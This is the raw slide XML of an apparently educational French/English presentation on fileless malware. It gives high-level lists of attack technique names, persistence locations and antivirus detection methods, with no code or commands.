                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>rès difficiles à détecter.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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61" y="1949998"/>
            <a:ext cx="463735" cy="4637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248" y="3040234"/>
            <a:ext cx="411648" cy="41164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604" y="3991480"/>
            <a:ext cx="476189" cy="476189"/>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248" y="4467669"/>
            <a:ext cx="411648" cy="41164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8794" y="4854377"/>
            <a:ext cx="436555" cy="436555"/>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813915883"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694898" y="1607735"/>
          <a:ext cx="1143279" cy="358648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Cibles</a:t>
                      </a:r>
                    </a:p>
                    <a:p>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Offuscation</a:t>
                      </a:r>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txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Détection AV</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Sandboxing</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>ML</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Right Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003273" y="2181865"/>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ight Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003272" y="324605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ight Arrow 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003271" y="4252932"/>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ight Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003270" y="4616174"/>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ight Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3003270" y="4964829"/>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08050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smtClean="0"/>
              <a:t>THREAT CATEGORIES </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Dual-use Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Non-PE attacks	</a:t>
            </a:r>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225" r="9225"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="588963" y="520700"/>
            <a:ext cx="4743450" cy="5816600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2126722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smtClean="0"/>
              <a:t>TTPs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>1.	Code Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Reflective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hollowing</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2.    Script-based attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>3.	Living off the Land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>4.	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Persistence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>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225" r="9225"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="588963" y="520700"/>
            <a:ext cx="4743450" cy="5816600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3911217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smtClean="0"/>
              <a:t>FILELESS MALWARE </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>as de téléchargement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>de fichiers malveillants </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Pas d’écriture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>de contenu sur le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>disque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiter des applications vulnérables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pour injecter du code malveillant directement dans la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>mémoire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Abuser des applications natives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(MS Office) et des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>outils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>d’administration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PowerShell,WMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>) – Living Off the Land (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>LOLBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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225" r="9225"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="588963" y="520700"/>
            <a:ext cx="4743450" cy="5816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9177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smtClean="0"/>
              <a:t>FILELESS PERSISTENCE </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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225" r="9225"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="588963" y="520700"/>
            <a:ext cx="4743450" cy="5816600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2241175"/>
            <a:ext cx="5181600" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Registry</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>WMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>GPO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Scheduled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3532993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smtClean="0"/>
              <a:t>MECHANISMES AV</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Pattern Matching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>filtrage par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>motif)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Heuristic Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>heuristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Behavioural</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>analyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>comportementale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Hash Matching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>orrespondance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hachage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>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225" r="9225"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="588963" y="520700"/>
            <a:ext cx="4743450" cy="5816600"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1980693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smtClean="0"/>
              <a:t>LIVING OFF THE LAND BINS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632247" y="1820254"/>
            <a:ext cx="847742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Garamond" panose="02020404030301010803"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="E32D91">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Garamond" panose="020204040303010108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smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="E32D91">
                  <a:lumMod val="50000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Garamond" panose="020204040303010108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Garamond" panose="02020404030301010803"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>				</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="18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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151546" y="2816906"/>
            <a:ext cx="2666074" cy="92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srgbClr val="FFFF00"/>
